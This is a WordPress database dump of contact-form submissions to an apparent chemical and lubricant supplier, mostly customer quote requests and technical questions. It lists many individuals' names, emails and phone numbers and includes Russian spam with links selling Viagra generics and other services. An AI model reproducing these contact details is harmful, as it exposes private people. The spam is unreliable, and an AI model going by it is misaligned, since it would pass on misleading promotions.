INSERT INTO `wp_postmeta` VALUES (39085, 4541, '_field_3', 'AGENT:RELEASE,LIQUID,BOTTLE,MIL-C-47003\r\nAGENT,RELEASE:\r\nFORM:\r\nLIQUID;\r\nCONTAINER:\r\nBOTTLE;\r\nSTANDARD/SPECIFICATION:\r\nMIL-C-47003;\r\nADDITIONAL DATA:\r\nPTFE RELEASE AGENT, DRY LUBRICANT TYPE.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#A50A313A0P0020\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nModel#MS-143N\r\nQTY 2 GAL\r\n\r\nPLEASE GIVE ME THIS ORDER PRICE ..... THANK YOU TOO MUCH'); 
INSERT INTO `wp_postmeta` VALUES (39086, 4541, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39087, 4541, '_sub_id', '4541'); 
INSERT INTO `wp_postmeta` VALUES (39088, 4542, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39089, 4542, '_seq_num', '719'); 
INSERT INTO `wp_postmeta` VALUES (39090, 4542, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39091, 4542, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39092, 4542, '_field_1', 'DonaldsowDM'); 
INSERT INTO `wp_postmeta` VALUES (39093, 4542, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (39094, 4542, '_field_2', 'fghgh@mail.ru'); 
INSERT INTO `wp_postmeta` VALUES (39095, 4542, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39096, 4542, '_field_3', 'Краткий обзор самых перспективных MMO игр две тысячи семнадцатого года \r\n \r\nВ приведённой ниже статье мы опишем для вас несколько самых новых и популярных MMO игр от передовых игровых студий нашей большой планеты например про браузерные стратегии , дабы вы сумели найти игрушку по-душе, которая поможет вам коротать не один нудный зимний вечерок. \r\n \r\nОбзоры и все о новинках игр ММО на сайте - mmostrike.ru'); 
INSERT INTO `wp_postmeta` VALUES (39097, 4542, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39098, 4542, '_sub_id', '4542'); 
INSERT INTO `wp_postmeta` VALUES (39099, 4543, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39100, 4543, '_seq_num', '311'); 
INSERT INTO `wp_postmeta` VALUES (39101, 4543, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39102, 4543, '_field_12', 'John Abernathy'); 
INSERT INTO `wp_postmeta` VALUES (39103, 4543, '_field_13', 'U.S.Navy, MARMC Dive Locker, Norfolk, VA.'); 
INSERT INTO `wp_postmeta` VALUES (39104, 4543, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39105, 4543, '_field_14', 'john.h.abernathy1@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (39106, 4543, '_field_15', '(757) 400-2313'); 
INSERT INTO `wp_postmeta` VALUES (39107, 4543, '_field_16', 'On some of our diving equipment we have a need for your Krytox 240ac and sometimes Christo-Lube MCG111. Can you tell me the difference between the two? Is there any difference? Do you sell the Krytox in small tubes about 2-3ozs.? Where can I get a quote to buy 10 tubes?'); 
INSERT INTO `wp_postmeta` VALUES (39108, 4543, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39109, 4543, '_sub_id', '4543'); 
INSERT INTO `wp_postmeta` VALUES (39110, 4544, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39111, 4544, '_seq_num', '312'); 
INSERT INTO `wp_postmeta` VALUES (39112, 4544, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39113, 4544, '_field_12', 'Troy Simmons'); 
INSERT INTO `wp_postmeta` VALUES (39114, 4544, '_field_13', 'Day &amp; Zimmermann '); 
INSERT INTO `wp_postmeta` VALUES (39115, 4544, '_field_18', 'N/A'); 
INSERT INTO `wp_postmeta` VALUES (39116, 4544, '_field_14', 'Troy.simmons@dayzim.com'); 
INSERT INTO `wp_postmeta` VALUES (39117, 4544, '_field_15', '(903) 219-2961'); 
INSERT INTO `wp_postmeta` VALUES (39118, 4544, '_field_16', 'would like to talk to someone about a cleaner to clean flux '); 
INSERT INTO `wp_postmeta` VALUES (39119, 4544, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39120, 4544, '_sub_id', '4544'); 
INSERT INTO `wp_postmeta` VALUES (39121, 4545, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39122, 4545, '_seq_num', '313'); 
INSERT INTO `wp_postmeta` VALUES (39123, 4545, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39124, 4545, '_field_12', 'Gary Avalon'); 
INSERT INTO `wp_postmeta` VALUES (39125, 4545, '_field_13', 'Chemsultants International, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (39126, 4545, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39127, 4545, '_field_14', 'gavalon@chemsultants.com'); 
INSERT INTO `wp_postmeta` VALUES (39128, 4545, '_field_15', '(440) 974-3080'); 
INSERT INTO `wp_postmeta` VALUES (39129, 4545, '_field_16', 'We are developing a product for one of our clients. The application will involve compression or injection molding a PU plastic material together with a Pressure Sensitive Adhesive based Hydrocolloid. The issue we face is finding a mold release agent that would allow the hydrocolloid adhesive to release after molding. Traditionally these hydrocolloids are extruded onto paper or poly release liners coated with Silicone release agents (poly-dimethyl-siloxane-based coatings). However, in our experience we have not molded these adhesives before and need to find out whether this is even feasible. Do you offer a custom release agent for such an application? Thank you. Gary, CTO for Chemsultants. '); 
INSERT INTO `wp_postmeta` VALUES (39130, 4545, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39131, 4545, '_sub_id', '4545'); 
INSERT INTO `wp_postmeta` VALUES (39132, 4546, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39133, 4546, '_seq_num', '720'); 
INSERT INTO `wp_postmeta` VALUES (39134, 4546, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39135, 4546, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39136, 4546, '_field_1', 'John Roney'); 
INSERT INTO `wp_postmeta` VALUES (39137, 4546, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (39138, 4546, '_field_2', 'johndroneyjohn@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39139, 4546, '_field_8', '(877) 228-1545'); 
INSERT INTO `wp_postmeta` VALUES (39140, 4546, '_field_3', 'Hi,\r\n\r\nYour website&#039;s design is absolutely brilliant. The visuals really enhance your message and the content compels action. I&#039;ve forwarded it to a few of my contacts who I think could benefit from your services.\r\nWhen I was looking at your site, though, I noticed a mistake that you&#039;ve made re: search engine optimization. It&#039;s a relatively important fix. Would you like me to write it up so that you can share it with your web team? If this is a priority, I can also get on a call.\r\n\r\nJohn D. Roney\r\nDigital Marketing Manager\r\n877-228-1545\r\nSmarter Tactics\r\nDigital Marketing | Ad Words Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (39141, 4546, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39142, 4546, '_sub_id', '4546'); 
INSERT INTO `wp_postmeta` VALUES (39143, 4548, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39144, 4548, '_seq_num', '721'); 
INSERT INTO `wp_postmeta` VALUES (39145, 4548, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39146, 4548, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39147, 4548, '_field_1', 'Duy L Nguyen'); 
INSERT INTO `wp_postmeta` VALUES (39148, 4548, '_field_10', 'Student'); 
INSERT INTO `wp_postmeta` VALUES (39149, 4548, '_field_2', 'duy.l.nguyen-1@ou.edu'); 
INSERT INTO `wp_postmeta` VALUES (39150, 4548, '_field_8', '(347) 653-4908'); 
INSERT INTO `wp_postmeta` VALUES (39151, 4548, '_field_3', ' I am writing this email to introduce me as well as to ask for an opportunity for a Co-op opportunity in Fall 2017 since I am truly interested in chemical processes. I will be graduating from the University of Oklahoma with a bachelor&#039;s degree in Chemical Engineering in Fall 2018.\r\n \r\nThrough attending in undergraduate chemical engineering plus my first bachelor degree in Petroleum Engineering, I have developed and improved valuable skills in technical such as heat exchangers sizing, pumps/pipes selections and designs, unit operations analysis, and separation processes. Accordingly, I believe that co-op experience will help me to expose my technical skills, problems solving abilities to the company&#039;s benefits and apply engineering standpoints to solve actual problems that I would never learn at school.\r\n \r\nPlease take your time to look over my resume. Thank you very much. I am looking forward to your responses. \r\n \r\nSincerely,\r\nDuy Nguyen \r\n'); 
INSERT INTO `wp_postmeta` VALUES (39152, 4548, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39153, 4548, '_sub_id', '4548'); 
INSERT INTO `wp_postmeta` VALUES (39154, 4549, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39155, 4549, '_seq_num', '722'); 
INSERT INTO `wp_postmeta` VALUES (39156, 4549, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39157, 4549, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39158, 4549, '_field_1', 'VerkicsewOA'); 
INSERT INTO `wp_postmeta` VALUES (39159, 4549, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (39160, 4549, '_field_2', 'mikulsem7@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39161, 4549, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39162, 4549, '_field_3', 'Проблемы интимного плана, так или иначе, в старшем возрасте беспокоят практически каждого мужчину, но мало кто сегодня стремиться идти к доктору с такой конфиденциальной проблемой! Чтобы избежать такого унижения и за раз решить проблемы с потенцией, вы можете зайти на наш ресурс. \r\n \r\nУ нас в ассортименте есть &lt;a href=&quot;http://via-sexgra.ru/viagra-kupit-moskva&quot;&gt;дженерики виагры левитры&lt;/a&gt;  и еще пара препаратов, нацеленных на почти моментальное восстановление нормальной потенции.'); 
INSERT INTO `wp_postmeta` VALUES (39163, 4549, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39164, 4549, '_sub_id', '4549'); 
INSERT INTO `wp_postmeta` VALUES (39165, 4550, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39166, 4550, '_seq_num', '723'); 
INSERT INTO `wp_postmeta` VALUES (39167, 4550, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39168, 4550, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39169, 4550, '_field_1', 'maru'); 
INSERT INTO `wp_postmeta` VALUES (39170, 4550, '_field_10', 'rinko'); 
INSERT INTO `wp_postmeta` VALUES (39171, 4550, '_field_2', 'maru@rinko-hk.com'); 
INSERT INTO `wp_postmeta` VALUES (39172, 4550, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39173, 4550, '_field_3', 'I would like to ask a product MS143XD, \r\n\r\n1.	Could you provide MSDS , \r\nTechnical information also the information of composition for us\r\n\r\n2.	Product specifications AND dimensions\r\n\r\n3.  suggested retail price\r\n\r\n\r\nI am looking forward to your reply. Thank you.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (39174, 4550, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39175, 4550, '_sub_id', '4550'); 
INSERT INTO `wp_postmeta` VALUES (39176, 4551, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39177, 4551, '_seq_num', '314'); 
INSERT INTO `wp_postmeta` VALUES (39178, 4551, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39179, 4551, '_field_12', 'Sayda Valenzuela'); 
INSERT INTO `wp_postmeta` VALUES (39180, 4551, '_field_13', 'Zodiac Aerospace Emergency Systems '); 
INSERT INTO `wp_postmeta` VALUES (39181, 4551, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39182, 4551, '_field_14', 'Sayda.Valenzuela@zodiacaerospace.com'); 
INSERT INTO `wp_postmeta` VALUES (39183, 4551, '_field_15', '(732) 567-3941'); 
INSERT INTO `wp_postmeta` VALUES (39184, 4551, '_field_16', 'Hi,\r\nOur costumer is requesting to know the MS-122 AD Miller-Stephenson Teflon Fluorocarbon coating data to show functionality at 3+ years once is applied.\r\nI would like to know if you could help us to accomplish this action, if there is a durability data document, whom would be the correct person that could advise us or what information should I provide you?\r\n\r\n\r\nYour support assistance would be greatly appreciated.\r\n\r\nHave a great day and thanks in advance.\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (39185, 4551, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39186, 4551, '_sub_id', '4551'); 
INSERT INTO `wp_postmeta` VALUES (39187, 4552, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39188, 4552, '_seq_num', '724'); 
INSERT INTO `wp_postmeta` VALUES (39189, 4552, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39190, 4552, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39191, 4552, '_field_1', 'Paul Thompson'); 
INSERT INTO `wp_postmeta` VALUES (39192, 4552, '_field_10', 'Lindal North America'); 
INSERT INTO `wp_postmeta` VALUES (39193, 4552, '_field_2', 'paul.thompson@lindalgroup.com'); 
INSERT INTO `wp_postmeta` VALUES (39194, 4552, '_field_8', '(812) 657-7142'); 
INSERT INTO `wp_postmeta` VALUES (39195, 4552, '_field_3', 'Good After Noon, Can I get a quote for 1 of this part number please, XHT-BDX. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (39196, 4552, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39197, 4552, '_sub_id', '4552'); 
INSERT INTO `wp_postmeta` VALUES (39198, 4553, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39199, 4553, '_seq_num', '315'); 
INSERT INTO `wp_postmeta` VALUES (39200, 4553, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39201, 4553, '_field_12', 'TAMMY HUGHES'); 
INSERT INTO `wp_postmeta` VALUES (39202, 4553, '_field_13', 'ENTERGY OPERATIONS'); 
INSERT INTO `wp_postmeta` VALUES (39203, 4553, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39204, 4553, '_field_14', 'THUGHES@ENTERGY.COM'); 
INSERT INTO `wp_postmeta` VALUES (39205, 4553, '_field_15', '(601) 368-5430'); 
INSERT INTO `wp_postmeta` VALUES (39206, 4553, '_field_16', 'TRYING TO LOCATE A REPLACMENT FOR \nFREON TF SOLVENT MS-180/C02\nCLEANER, DEGREASER, FREON TF SOLVENT MILLER STEPH 180/C02, AEROSOL, 16 OZ CAN\nPER EMAIL FROM YOUR CUST. SERVICE\nSent: Tuesday, June 13, 2017 2:17 PM\nTo: HUGHES, TAMMY M\nSubject: RE: URGENT RFQ# 263136\n\n\nHI Tammy,\n\nThis material has been discontinued, you will need to call technical at 1-800-992-2424 with your application for the replacement, once you have that let me know and I will be happy to quote.\n\n\n\nKarina Simion\nCustomer Service Manager\n'); 
INSERT INTO `wp_postmeta` VALUES (39207, 4553, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39208, 4553, '_sub_id', '4553'); 
INSERT INTO `wp_postmeta` VALUES (39209, 4554, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39210, 4554, '_seq_num', '725'); 
INSERT INTO `wp_postmeta` VALUES (39211, 4554, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39212, 4554, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39213, 4554, '_field_1', 'Hank LOMASNEY'); 
INSERT INTO `wp_postmeta` VALUES (39214, 4554, '_field_10', 'SANDIA SOLAR TECHNOLOGY'); 
INSERT INTO `wp_postmeta` VALUES (39215, 4554, '_field_2', 'hank.lomasney@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39216, 4554, '_field_8', '(970) 946-3683'); 
INSERT INTO `wp_postmeta` VALUES (39217, 4554, '_field_3', 'I have been referred to you by Hexion to provide me with pricing on multiple drum quantities of its Epirez 3510 w 60 and also its Epicure 3295. \r\nCould you please confirm that you have received this request? '); 
INSERT INTO `wp_postmeta` VALUES (39218, 4554, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39219, 4554, '_sub_id', '4554'); 
INSERT INTO `wp_postmeta` VALUES (39220, 4555, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39221, 4555, '_seq_num', '726'); 
INSERT INTO `wp_postmeta` VALUES (39222, 4555, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39223, 4555, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39224, 4555, '_field_1', 'VikreaJefNC'); 
INSERT INTO `wp_postmeta` VALUES (39225, 4555, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (39226, 4555, '_field_2', 'ylrmtsxuxrfa@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39227, 4555, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39228, 4555, '_field_3', 'Подключение электричества под ключ к частному дому, зданию довольно сложная процедура и выполнение ее необходимо поручать только профессионалам. \r\n \r\nЭлектромонтажная компания «Центр Энергетических Решений и Инноваций» надежная универсальная энергетическая организация имеет большой опыт решения сложнейших задач присоединения к электросетям жилых домов и коммерческих объектов а так же &lt;a href=&quot;http://center-energo.com/services/usluga_3&quot;&gt;электромонтажные работы на производстве&lt;/a&gt; . \r\n \r\nСпециалисты компании осуществят получение ТУ, проектирование электроснабжения, электромонтажные работы и технологическое подключение к электрическим сетям с гарантией в кратчайшие сроки.'); 
INSERT INTO `wp_postmeta` VALUES (39229, 4555, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39230, 4555, '_sub_id', '4555'); 
INSERT INTO `wp_postmeta` VALUES (39231, 4556, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39232, 4556, '_seq_num', '727'); 
INSERT INTO `wp_postmeta` VALUES (39233, 4556, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39234, 4556, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39235, 4556, '_field_1', 'Teresa Skinner'); 
INSERT INTO `wp_postmeta` VALUES (39236, 4556, '_field_10', 'Amfuel'); 
INSERT INTO `wp_postmeta` VALUES (39237, 4556, '_field_2', 'Teresa.Skinner@amfuel.com'); 
INSERT INTO `wp_postmeta` VALUES (39238, 4556, '_field_8', '(870) 235-7222'); 
INSERT INTO `wp_postmeta` VALUES (39239, 4556, '_field_3', 'I am looking for Diamond Kote W-92 Mold Lube. Do you make this or know someone that might?'); 
INSERT INTO `wp_postmeta` VALUES (39240, 4556, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39241, 4556, '_sub_id', '4556'); 
INSERT INTO `wp_postmeta` VALUES (39242, 4557, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39243, 4557, '_seq_num', '728'); 
INSERT INTO `wp_postmeta` VALUES (39244, 4557, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39245, 4557, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39246, 4557, '_field_1', 'Mark Wade'); 
INSERT INTO `wp_postmeta` VALUES (39247, 4557, '_field_10', 'Kaman Industrial Technologies, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (39248, 4557, '_field_2', 'mark.wade@kaman.com'); 
INSERT INTO `wp_postmeta` VALUES (39249, 4557, '_field_8', '(706) 884-2200'); 
INSERT INTO `wp_postmeta` VALUES (39250, 4557, '_field_3', 'I need a price and lead time on two 14 oz grease gun cartridges of Krytox  FPG028\n\nThanks!!'); 
INSERT INTO `wp_postmeta` VALUES (39251, 4557, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39252, 4557, '_sub_id', '4557'); 
INSERT INTO `wp_postmeta` VALUES (39253, 4558, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39254, 4558, '_seq_num', '316'); 
INSERT INTO `wp_postmeta` VALUES (39255, 4558, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39256, 4558, '_field_12', 'Jerry Pries'); 
INSERT INTO `wp_postmeta` VALUES (39257, 4558, '_field_13', 'BioInnovations'); 
INSERT INTO `wp_postmeta` VALUES (39258, 4558, '_field_18', 'n/a'); 
INSERT INTO `wp_postmeta` VALUES (39259, 4558, '_field_14', 'jpries@leadlok.com'); 
INSERT INTO `wp_postmeta` VALUES (39260, 4558, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (39261, 4558, '_field_16', 'FluoroExtreme Dental Lubricant-What is the drying time of this product?\n\nI looked over the product in your link. I&#039;m asking for a bit more technical help choosing the correct spray product for my application. I have to have a fast drying product, no skin irritation once dry, and something that can be used in the biomedical field. \n\nIf one can imagine assembling a regular bandage by hand. It has numerous layers to it. Using an alignment template(acrylic) and laying down the adhesive side over the absorbent pad, the adhesive cannot adhere to the assembly alignment template. Also, the release agent can not adhere to the bandage adhesive. Skin irritation from the agent cannot cause a problem. \n\nIs there someone I can get this type of help from your company?\n'); 
INSERT INTO `wp_postmeta` VALUES (39262, 4558, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39263, 4558, '_sub_id', '4558'); 
INSERT INTO `wp_postmeta` VALUES (39264, 4559, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39265, 4559, '_seq_num', '729'); 
INSERT INTO `wp_postmeta` VALUES (39266, 4559, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39267, 4559, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39268, 4559, '_field_1', 'Jim Waldron'); 
INSERT INTO `wp_postmeta` VALUES (39269, 4559, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (39270, 4559, '_field_2', 'jnawaldron@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39271, 4559, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39272, 4559, '_field_3', 'Hello, \r\nI&#039;m trying to solve an annoying problem related to the splined slip yoke on the driveshaft of my 3/4 ton GMC truck. The splined shaft sticks and does not move freely in and out when taking off from a complete stop. This creates a thud sound emanating from the driveline. GM is well aware of this problem and will re-grease the splines while under warranty, but once it is up they say it is your responsibility to re-grease it. This process from what I have read could be needed as often as once a year! I have used your synthetic oil in the past with great success, so any information on a product you have that would reduce the frequency or eliminate re-greasing of the splines would be greatly appreciated. \r\n\r\nThank you,\r\nJim Waldron'); 
INSERT INTO `wp_postmeta` VALUES (39273, 4559, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39274, 4559, '_sub_id', '4559'); 
INSERT INTO `wp_postmeta` VALUES (39275, 4562, '_wp_attached_file', '2016/09/10X-Italian.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39276, 4563, '_wp_attached_file', '2016/09/10X-EU-1272-2008-CPL.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39277, 4564, '_wp_attached_file', '2016/09/10X-Italian-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39278, 4565, '_wp_attached_file', '2016/09/10X-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39279, 4566, '_wp_attached_file', '2016/09/246.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39280, 4567, '_wp_attached_file', '2016/09/250-Series-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39281, 4568, '_wp_attached_file', '2016/09/280.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39282, 4573, '_wp_attached_file', '2016/09/114D-17.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39283, 4575, '_wp_attached_file', '2016/09/124H-15.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39284, 4578, '_edit_lock', '1497641089:3'); 
INSERT INTO `wp_postmeta` VALUES (39285, 4578, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (39291, 4582, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39292, 4582, '_seq_num', '730'); 
INSERT INTO `wp_postmeta` VALUES (39293, 4582, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39294, 4582, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39295, 4582, '_field_1', 'HANI JAZAERLI'); 
INSERT INTO `wp_postmeta` VALUES (39296, 4582, '_field_10', 'Concordia University'); 
INSERT INTO `wp_postmeta` VALUES (39297, 4582, '_field_2', 'hanijaz@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39298, 4582, '_field_8', '(514) 660-7478'); 
INSERT INTO `wp_postmeta` VALUES (39299, 4582, '_field_3', 'Good day,\r\nMy name is Hani Jazaerli am a master student at Concordia University, Montreal/Quebec city...\r\nYesterday i asked by the phone about a krytox KS 1220 ( price, quantity and the way of payment) no one did give me any informations about that... If you could please provide me with the previous information by email so i can keep it as a reference and discuss it with my supervisor and do the purchasing...\r\nPlease reply as soon as possible.\r\nSincerely Hani.'); 
INSERT INTO `wp_postmeta` VALUES (39300, 4582, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39301, 4582, '_sub_id', '4582'); 
INSERT INTO `wp_postmeta` VALUES (39302, 4583, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39303, 4583, '_seq_num', '317'); 
INSERT INTO `wp_postmeta` VALUES (39304, 4583, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39305, 4583, '_field_12', 'Johan Maertens'); 
INSERT INTO `wp_postmeta` VALUES (39306, 4583, '_field_13', 'Victaulic Company'); 
INSERT INTO `wp_postmeta` VALUES (39307, 4583, '_field_18', 'new'); 
INSERT INTO `wp_postmeta` VALUES (39308, 4583, '_field_14', 'jmaertens@victaulic.com'); 
INSERT INTO `wp_postmeta` VALUES (39309, 4583, '_field_15', '(610) 923-3795'); 
INSERT INTO `wp_postmeta` VALUES (39310, 4583, '_field_16', 'CONFIDENTIAL\nInquiring about selecting mold release for automated RIM application for polyurea and/or polyisocyanurate hard foam molding, intricate shape'); 
INSERT INTO `wp_postmeta` VALUES (39311, 4583, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39312, 4583, '_sub_id', '4583'); 
INSERT INTO `wp_postmeta` VALUES (39314, 4585, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39315, 4585, '_seq_num', '318'); 
INSERT INTO `wp_postmeta` VALUES (39316, 4585, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39317, 4585, '_field_12', 'Linda M kelley '); 
INSERT INTO `wp_postmeta` VALUES (39318, 4585, '_field_13', 'CNS'); 
INSERT INTO `wp_postmeta` VALUES (39319, 4585, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39320, 4585, '_field_14', 'Linda.Kelley@cns.doe.gov'); 
INSERT INTO `wp_postmeta` VALUES (39321, 4585, '_field_15', '(806) 477-6625'); 
INSERT INTO `wp_postmeta` VALUES (39322, 4585, '_field_16', 'What is weight of an individual can of MS-122AD Aerosol.  What does it weigh when you sit it on a scale ...with lid and w/o lid? '); 
INSERT INTO `wp_postmeta` VALUES (39323, 4585, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39324, 4585, '_sub_id', '4585'); 
INSERT INTO `wp_postmeta` VALUES (39325, 4589, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39326, 4589, '_seq_num', '731'); 
INSERT INTO `wp_postmeta` VALUES (39327, 4589, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39328, 4589, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39329, 4589, '_field_1', 'Steve Kim'); 
INSERT INTO `wp_postmeta` VALUES (39330, 4589, '_field_10', 'BKT'); 
INSERT INTO `wp_postmeta` VALUES (39331, 4589, '_field_2', 'dozzok@naver.com'); 
INSERT INTO `wp_postmeta` VALUES (39332, 4589, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39333, 4589, '_field_3', 'Dear Sir,\r\n \r\nhow are you?\r\n \r\nWe are a trading company in Korea.\r\nWe are lookong for thermal radical initiator powder whose main material is  O-IMINO ISOUREA COMPOUND. we called free radical polymerization.\r\n \r\nPlease inform me of the above chemicals.\r\n \r\nThank you and best regards,\r\n \r\n \r\nSteve Kim\r\nB K T KOREA\r\ndozzok@naver.com'); 
INSERT INTO `wp_postmeta` VALUES (39334, 4589, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39335, 4589, '_sub_id', '4589'); 
INSERT INTO `wp_postmeta` VALUES (39336, 4590, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39337, 4590, '_seq_num', '732'); 
